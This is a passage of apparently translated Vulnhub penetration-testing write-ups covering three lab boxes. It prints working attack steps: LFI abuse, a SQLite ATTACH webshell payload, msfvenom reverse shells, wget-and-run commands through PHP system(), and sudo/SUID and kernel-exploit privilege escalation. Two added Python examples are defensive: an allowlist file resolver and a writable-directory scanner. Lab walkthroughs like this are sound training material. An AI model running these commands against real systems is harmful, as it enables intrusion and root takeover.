/></p><p>Output of the web server and msf:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277706402332.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9052' class='md-header-anchor '></a>Privilege escalation</h2><p>The basic approach to Linux privilege escalation:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9057' class='md-header-anchor '></a>1. Overflow exploit</h3><p>With a Meterpreter shell on the target, have a quick look at the system.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277711519803.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The system is <code>Ubuntu 16.04 (Linux 4.10.0-40-generic)</code>; an Ubuntu 16.04 privilege-escalation exploit came out recently, so try it here.</p><p>Exploit: <a href='https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' target='_blank' class='url'>https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c</a></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277744279712.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Escalation fails.</p><h3><a name='header-n9070' class='md-header-anchor '></a>2. Escalation with msf</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>No usable privilege-escalation vulnerability is found.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277748088090.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9079' class='md-header-anchor '></a>3. Misconfigured SUID file</h3><p>Enter an interactive shell and spawn bash:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>In the web directory there is <code>xxxlogauditorxxx.py</code>, which should not be there; it is presumably the special file the challenge description refers to, and it is unusually large.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277741330578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Running the py file shows it is a log-auditing program. Pointing it at the Apache2 log shows that it runs <code>cat</code>, which fails for lack of permissions.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277716185341.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Looking at the file's permissions closely, it has the SUID bit set and is owned by root.</p><p>Check the user's sudo rights with <code>sudo --list</code>.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277721141332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The py file can be run as root without a password. That makes things much easier.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277722533145.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The py file's misconfiguration allows commands to be executed directly as root.</p><p>Next, get a root shell.</p><h3><a name='header-n9106' class='md-header-anchor '></a>4. Getting a root shell</h3><p>The msfvenom payload uploaded earlier is reused. First exit the <code>shell</code>, send the session to the background with <code>background</code>, then start the listener again and background it as well.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277724353655.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Use the special file to run the msf payload as root.</p><pre class="md-fences md-end-block" lang="">sudo ./xxxlogauditorxxx.py
/var/log/apache2/access.log|./shell.elf</pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277726121084.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The py program reports an error afterwards, but that does not stop the payload from running.</p><p>Enter the shell of session 2 and check the privileges:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277727104925.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9122' class='md-header-anchor '></a>Getting the flag</h2><p>In root's home directory there is a <code>flag.png</code>:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729121417.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Download it for local analysis:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729313511.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729611404.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Presumably the next test is image steganography.</p><p>Analysis finds a base64 string at the end of the image file.</p><p><img 
<p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277730366648.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Write the base64 into <code>flag.txt</code> and decode it to get the flag:</p><p><code>cat flag | base64 -d</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277731880443.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9145' class='md-header-anchor '></a>Review of the approach</h2><p>With the final goal reached, let's look back at the points that failed earlier.</p><h3><a name='header-n9148' class='md-header-anchor '></a>1. Why the web-side attempts failed</h3><p>First, the core code of index.php:</p><pre><code>&lt;?php
$file = $_GET["file"];

$file = str_ireplace("etc","", $file);
$file = str_ireplace("php:","", $file);
$file = str_ireplace("expect:","", $file);
$file = str_ireplace("data:","", $file);
$file = str_ireplace("proc","", $file);
$file = str_ireplace("home","", $file);
$file = str_ireplace("opt","", $file);

if ($file == "/var/log/auth.log") {
    header("location: index.php");
}
else{
    include($file);
}

include($file);
?&gt;</code></pre><p>As you can see, <code>index.php</code> blanks out a number of keywords.</p><p>So the reasons the earlier attempts did not work are as follows:</p><ul><li>Reading files through stream wrappers failed</li></ul><p><code>php:</code> is filtered without regard to case (<code>str_ireplace</code>), so the wrappers cannot be used to read files.</p><ul><li>Reading configuration files, passwd and the like failed</li></ul><p><code>etc</code> is filtered, so no configuration file can be read</p><ul><li>Reading the Apache access log failed.</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277739100061.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Because of file permissions, the <code>www-data</code> user can neither write nor read the Apache log files, so including the Apache log failed.</p>
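<p>The filter above explains why the attempts failed, but it also shows the structural weakness of that kind of fix: it removes a handful of strings and then still hands the result to <code>include()</code>, so protection rests entirely on the blacklist being complete. The example below is added here and is not from the original page; it is written in Python rather than PHP as a model of the other approach: resolve the requested name against a fixed page directory, accept only names on an allowlist, and refuse stream wrappers, absolute paths and traversal before anything is read. The directory, the allowlist and the sample requests are constructed for the demo.</p>

```python
import posixpath
from typing import Iterable, Optional

# Constructed page directory and allowlist (assumptions for the example).
PAGE_ROOT = "/var/www/pages"
ALLOWED_PAGES = frozenset({"index.html", "tools.html", "about.html"})


def resolve_page(requested: str, page_root: str = PAGE_ROOT,
                 allowed: Iterable[str] = ALLOWED_PAGES) -> Optional[str]:
    """Return the absolute path that may be included, or None to refuse.

    Structural rejects come first (wrappers, NUL bytes, absolute paths,
    traversal), then the allowlist, then a containment check on the
    normalised result so a slip in the earlier steps still cannot leave
    page_root. Nothing is removed or rewritten: a bad request is refused,
    not "cleaned".
    """
    if not requested or len(requested) > 64:
        return None
    # php://, data:, expect:, file: ... all carry a scheme separator; a page
    # name never does, so the character itself is grounds for refusal.
    if ":" in requested or "\x00" in requested:
        return None
    # Absolute paths and ".." components never name a page either.
    if requested.startswith("/") or ".." in requested.split("/"):
        return None
    # Only an exact, known file name is accepted (no subdirectories).
    if requested != posixpath.basename(requested) or requested not in set(allowed):
        return None
    full = posixpath.normpath(posixpath.join(page_root, requested))
    # Belt and braces: the resolved path must still sit inside the root.
    if posixpath.commonpath([page_root, full]) != page_root:
        return None
    return full


# Constructed requests: the legitimate link target, then the shapes the
# blacklist above was trying to stop.
SAMPLE_REQUESTS = [
    "tools.html",
    "../../../../etc/passwd",
    "php://filter/resource=index.php",
    "/var/log/apache2/access.log",
    "index.php",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print("%-40s -> %s" % (req, resolve_page(req)))
```

<p>Note that <code>index.php</code> is refused even though it exists in the directory: the allowlist names pages that are meant to be included, not files that happen to be present.</p>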
<h3><a name='header-n9176' class='md-header-anchor '></a>2. Why the system-side attempts failed</h3><ul><li>Overflow privilege escalation failed</li></ul><p>From the error output, the likely reason is that the target is a 32-bit system while the exp only supports 64-bit systems.</p><h2><a name='header-n9183' class='md-header-anchor '></a>Summary</h2><p>Key breakthrough points:</p><ol start='' ><li>Discovery of a PHP local file inclusion vulnerability</li><li>Writing a one-line webshell into the SSH log</li><li>Getting a shell via LFI plus the SSH log</li><li>Generating a payload with MSF, then dropping and running it through the one-liner</li><li>Privilege escalation through a misconfigured SUID program</li></ol><p>There are many other directions one could take on this box, for example:</p><ol start='' ><li>With the file inclusion vulnerability, fuzz the various configuration files with a wordlist.</li><li>Use NC or another reverse-shell technique to get the shell back.</li></ol><p>Beyond that, the Metasploit Framework has many convenient, practical features; mastering it greatly simplifies some steps of a penetration test and is well worth studying in depth.</p><p>Overall this box is fairly simple: one web service and one SSH service, so there are only two points to work with, the path is clear, and it is easy for a learner to complete.</p><h1><a name='header-n9215' class='md-header-anchor '></a>Section 9: zico2</h1><h2><a name='header-n9217' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9218' class='md-header-anchor '></a>Download link</h3><p> <a href='https://download.vulnhub.com/zico/zico2.ova' target='_blank' class='url'>https://download.vulnhub.com/zico/zico2.ova</a></p><h3><a name='header-n9221' class='md-header-anchor '></a>Environment</h3><ul><li>The box is provided as an OVA image and VirtualBox is officially recommended: download it from Vulnhub and import it into VirtualBox to run it.</li><li>Target: set the network to bridged mode.</li><li>Attacker: a Kali VM, also bridged, so it can reach the target.</li></ul><h3><a name='header-n9232' class='md-header-anchor '></a>Description</h3><p>Difficulty: medium.</p><p>The goal is to break into the box, get root, and read the flag file.</p><p>The official hint is: enumerate, enumerate, enumerate.</p><h2><a name='header-n9239' class='md-header-anchor '></a>Information gathering</h2><ul><li><p>IP discovery</p><p>First, check Kali's network configuration.
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852282391.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then use nmap to find the target. <code>nmap -sP 192.168.1.0/24</code> shows four relevant IPs on the segment.</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852529644.jpg' alt='' referrerPolicy='no-referrer' /></p></li><li><p>Port scan and service identification</p><p>Scan the <code>192.168.1.0/24</code> segment with nmap's fast-scan option (<code>-F</code>)</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307853380399.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The <code>Mac</code> address makes it obvious: <code>192.168.1.3</code> is the VM running on VirtualBox, i.e. the target we built.</p><p>With the target IP confirmed, run a more detailed Nmap probe: <code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>The parameters:</p><ul><li><code>-A</code> aggressive scan of the target IP: loads all scripts and probes as thoroughly as possible;</li><li><code>-v</code> show the scan progress in detail;</li><li><code>-oN</code> write the results as plain text to <code>nmap.txt</code>.
The results:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307855078046.jpg' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>Threat modeling</p><p>The nmap results show ports <code>22</code>, <code>80</code> and <code>111</code> open, and the OS is <code>Linux</code>. Port <code>22</code> is <code>SSH</code>; port <code>80</code> is <code>http</code>, served by <code>Apache/2.2.22</code>.</p><p>Web applications usually have all sorts of problems, so after this first look the web service is chosen as the initial entry point.</p></li></ul><h2><a name='header-n9286' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n9287' class='md-header-anchor '></a>1. Directory scan with dirb</h3><p><code>dirb http://192.168.1.3</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307858659578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>A sensitive directory, <code>dbadmin</code>, is found</p><h3><a name='header-n9294' class='md-header-anchor '></a>2. Directory listing</h3><p>Visiting <code>http://192.168.1.3/dbadmin/</code> shows a directory listing, which contains a <code>test_db.php</code> file.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307859615079.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9299' class='md-header-anchor '></a>3. Weak password</h3><p>Visiting <code>http://192.168.1.3/dbadmin/test_db.php</code> shows something like phpmyadmin for MySQL; on this box it is a web-based manager for sqlite.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307860283151.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The weak password <code>admin</code> gets us in.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307865109650.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9308' class='md-header-anchor '></a>4. 
Information gathering in phpLiteAdmin</h3><p>Looking at the existing database reveals two accounts; the hashes were cracked with somd5.com.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307883468354.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This gives the following:</p><pre><code>root 34kroot34
zico zico2215@</code></pre><h3><a name='header-n9316' class='md-header-anchor '></a>5. 
File inclusion vulnerability</h3><p>Browsing the site's features, one link is: <a href='http://192.168.1.3/view.php?page=tools.html' target='_blank' class='url'>http://192.168.1.3/view.php?page=tools.html</a></p><p>This suggests a file inclusion vulnerability. After some attempts, the Linux passwd file can be included successfully.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307882619884.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9323' class='md-header-anchor '></a>Getting a webshell</h2><h3><a name='header-n9324' class='md-header-anchor '></a>1. Trying to get a shell by creating a new database</h3><p>Sqlite is widely used in embedded devices; it is a single-file database, similar to Access. The idea is to create a database named <code>shell.php</code>, which would produce a file called shell.php. However, the database files live under <code>/usr/databases/test_users</code></p><p>So try creating a database named <code>../../var/www/html/shell.php</code>.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307866554332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The database is created, but the <code>/</code> characters are filtered out. This approach fails, but it is noted here as a possible breakthrough point.</p><h3><a name='header-n9335' class='md-header-anchor '></a>2. Trying to get a shell by exporting a file</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307867627327.jpg' alt='' referrerPolicy='no-referrer' /></p><p>payload: <code>ATTACH DATABASE '/var/www/html/shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('&lt;?php phpinfo();?&gt;');</code></p><p>Writing files this way requires the following:</p><ol start='' ><li>Direct access to the database to execute SQL statements.</li><li>Stacked queries enabled (off by default)</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307875215505.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Execution fails; this point is abandoned.</p><h3><a name='header-n9353' class='md-header-anchor '></a>3. 
Getting a shell with phpliteadmin and the file inclusion vulnerability</h3><p>The earlier attempts found a file inclusion vulnerability and database access. Combining the two gives a shell, as follows:</p><ol start='' ><li>Add a record through phpliteadmin so that it is written into the database file.</li><li>Include the database file through the file inclusion vulnerability to get a shell.</li></ol><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307890668345.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307891213556.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9371' class='md-header-anchor '></a>4. Planting a Meterpreter shell</h3><p>First generate an msf executable payload.</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf > ~/Desktop/msf.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307919687573.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then start a simple web server with Python: <code>python -m SimpleHTTPServer 80</code></p><p>Then use the one-liner obtained earlier to run commands that download and execute the payload.</p><p>Download the payload: <code>x=system('wget http://192.168.1.4:9999/msf.elf');</code></p><p>Then <code>x=system('ls');</code> shows it was not saved, presumably because of permissions. So download it straight into <code>/tmp</code></p><p><code>x=system('wget http://192.168.1.4:9999/msf.elf -O /tmp/msf.elf');</code></p><p>Check:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307925456818.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then make it executable and run it.</p><pre><code>x=system('chmod +x /tmp/msf.elf');
x=system('/tmp/msf.elf');</code></pre><p>The result:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926464521.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9401' class='md-header-anchor '></a>Privilege escalation</h2><p>The basic approach to Linux privilege escalation:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9408' class='md-header-anchor '></a>1. Privilege escalation with msf</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>No usable privilege escalation vulnerability is found.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307944129988.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9417' class='md-header-anchor '></a>2. Privilege escalation via an overflow</h3><p>With a Meterpreter shell on the target, take a quick look at the system information.
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926898597.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The system is <code>Ubuntu 12.04 (Linux 3.2.0-23-generic)</code>. Search <code>www.exploit-db.com</code> for a matching exp.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928156767.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The second EXP is used here, at: <code>https://www.exploit-db.com/exploits/33589/</code></p><p>Usage:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928690163.jpg' alt='' referrerPolicy='no-referrer' /></p><p>First write the C code to the target through the Meterpreter shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307929385748.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Enter the shell and use Python to spawn a proper shell.
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code>.</p><p>Then compile and run the exp.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931869735.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9443' class='md-header-anchor '></a>Getting the flag</h2><p>A <code>flag.txt</code> file is found in root's home directory:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931748150.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9447' class='md-header-anchor '></a>Review of the approach</h2><p>With the final goal reached, let's look back at the points that failed earlier.</p><h3><a name='header-n9450' class='md-header-anchor '></a>1. Why writing a shell through phpliteadmin failed</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307932678504.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The web root is <code>/var/www</code>, not <code>/var/www/html</code>; moreover, the permissions on the <code>www</code> directory itself do not allow a shell to be written there directly.</p><p>However, the other directories under <code>/var/www/</code> have very permissive settings, and a shell can be written there directly.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307933864994.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9459' class='md-header-anchor '></a>2. Trying again to get a shell by writing through phpliteadmin</h3><p>Building on the above, we now know the site's absolute path and that the other folders in the web directory have permission problems.</p><p>Try writing a shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307936953989.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Written successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307937353945.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9472' class='md-header-anchor '></a>Summary</h2><p>Key breakthrough points:</p><ol start='' ><li>Weak phpliteadmin login password</li><li>Writing a one-line webshell into the database file through phpliteadmin</li><li>Getting a shell via LFI plus the database file</li><li>Generating a payload with MSF, using the one-liner to find a writable directory, then dropping and running it</li><li>Privilege escalation to root through a system vulnerability</li></ol><p>There are many other directions one could take on this box, for example:</p><ol start='' ><li>With the file inclusion vulnerability, fuzz the various configuration and log files with a wordlist, e.g. get a shell by including the SSH log.</li><li>Fuzz the site's absolute path and write a shell through phpliteadmin.</li></ol><p>Overall this box is a lot of fun: it tests basic web vulnerabilities and their combination with phpliteadmin, as well as directory permission settings. It can be completed in several ways and has high replay value.</p>
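<p>The point in the retrospective above is a permissions one: <code>www</code> itself was not writable by the web server, but sibling directories under it were, which is all the planted shell needed. The check below is an added example, not from the original page: a Python walk over a web root that reports every entry the web server account could write to (world-writable, or owned by that account with owner-write set) and every symlink. The uid, the root path and the temporary sample tree are constructed for the demo.</p>

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Web server account the check is written against (assumption for the example;
# 33 is www-data on Debian/Ubuntu).
WEB_USER_UID = 33


def find_writable_by_web(root: str, web_uid: int = WEB_USER_UID) -> List[Tuple[str, str]]:
    """Return (path, reason) for every entry under root that the web server
    could write to, plus any symlink. Symlinks are not followed, so a link
    pointing out of the web root cannot drag the walk elsewhere."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                findings.append((path, "symlink inside web root"))
            elif mode & stat.S_IWOTH:
                findings.append((path, "world-writable (mode %o)" % stat.S_IMODE(mode)))
            elif st.st_uid == web_uid and mode & stat.S_IWUSR:
                findings.append((path, "owned and writable by web user"))
    return sorted(findings)


def build_sample_tree() -> str:
    """Constructed layout modelled on the box: a document root with sane
    permissions next to a sibling directory that anyone can write to."""
    root = tempfile.mkdtemp(prefix="webroot-")
    html = os.path.join(root, "html")
    other = os.path.join(root, "other")
    os.mkdir(html)
    os.mkdir(other)
    with open(os.path.join(html, "index.html"), "w") as fh:
        fh.write("hello\n")
    with open(os.path.join(other, "note.txt"), "w") as fh:
        fh.write("scratch\n")
    # chmod after creation so the process umask does not mask the bits.
    os.chmod(html, 0o755)
    os.chmod(os.path.join(html, "index.html"), 0o644)
    os.chmod(other, 0o777)
    os.chmod(os.path.join(other, "note.txt"), 0o666)
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for path, reason in find_writable_by_web(sample):
        print(path, "->", reason)
```

<p>On a real host the walk would start at the document root's parent, exactly as the box showed that the interesting directory was a sibling rather than the document root itself.</p>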
<h1><a name='header-n9507' class='md-header-anchor '></a>Section 10: Quaoar</h1><h2><a name='header-n9508' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9509' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/hackfest2016/Quaoar.ova' target='_blank' class='url'>https://download.vulnhub.com/hackfest2016/Quaoar.ova</a></p><h3><a name='header-n9512' class='md-header-anchor '></a>Environment</h3><ul><li>The box is provided as an OVA image and VirtualBox is officially recommended: download it from Vulnhub and import it into VirtualBox to run it.</li><li>Target: set the network to bridged mode.</li><li>Attacker: a Kali VM, also bridged, so it can reach the target.</li></ul><h3><a name='header-n9523' class='md-header-anchor '></a>Description</h3><p>Difficulty: beginner.</p><p>The goal is to break into the box, find the flags, and get root.</p><p>The author recommends the tools <code>nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra</code></p><h2><a name='header-n9530' class='md-header-anchor '></a>Information gathering</h2><ul><li><p>IP discovery</p><p>First, check Kali's network configuration.
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/1.JPG' alt='' referrerPolicy='no-referrer' /></p><p>The target prints its own IP directly on its console</p></li></ul><p>   <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/2.JPG' alt='' referrerPolicy='no-referrer' /></p><ul><li><p>Port scan and service identification</p><p>With the target IP confirmed, run a more detailed Nmap probe: <code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>The parameters:</p><ul><li><code>-A</code> aggressive scan of the target IP: loads all scripts and probes as thoroughly as possible;</li><li><code>-v</code> show the scan progress in detail;</li><li><code>-oN</code> write the results as plain text to <code>nmap.txt</code>.
The results:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/3.JPG' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>Threat modeling</p><p>The nmap results show ports <code>22</code> and <code>80</code> open, and the OS is <code>Linux</code>. Port <code>22</code> is <code>SSH</code>; port <code>80</code> is <code>http</code>, served by <code>Apache/2.2.22</code>.</p><p>Web applications usually have all sorts of problems, so after this first look the web service is chosen as the initial entry point.</p></li></ul><h2><a name='header-n9573' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n9575' class='md-header-anchor '></a>1. Directory scan with dirb</h3><p><code>dirb http://172.19.0.182</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/4.JPG' alt='' referrerPolicy='no-referrer' /></p><p>robots.txt, an upload directory and a wordpress directory are found.</p><p>robots.txt also points to the wordpress directory</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/5.JPG' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9586' class='md-header-anchor '></a>2. 
Weak password</h3><p>Scan with wpscan</p><pre><code>wpscan -u http://172.19.0.182/wordpress --wp-content-dir wp-content --enumerate u

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Fri Jul  6 22:13:24 2018
[+] Requests Done: 62
[+] Memory used: 63.867 MB
[+] Elapsed time: 00:00:05</code></pre><p>The weak credentials <code>admin</code> / <code>admin</code> get us in.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/6.JPG' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9599' class='md-header-anchor '></a>Getting a webshell</h2><h3><a name='header-n9600' class='md-header-anchor '></a>1. Getting a shell by editing and adding a file</h3><p><code>cp /usr/share/webshells/php/php-reverse-shell.php shelly.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/7.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Edit the shell, start an NC listener locally, then visit a non-existent page to get the shell</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/8.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Get a proper shell with python</p><p><code>python -c 'import pty; pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/9.JPG' alt='' referrerPolicy='no-referrer' /></p><p>With this account's privileges, the first flag is obtained</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/10.JPG' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9622' class='md-header-anchor '></a>Privilege escalation</h2><h3><a name='header-n9623' class='md-header-anchor '></a>1. 
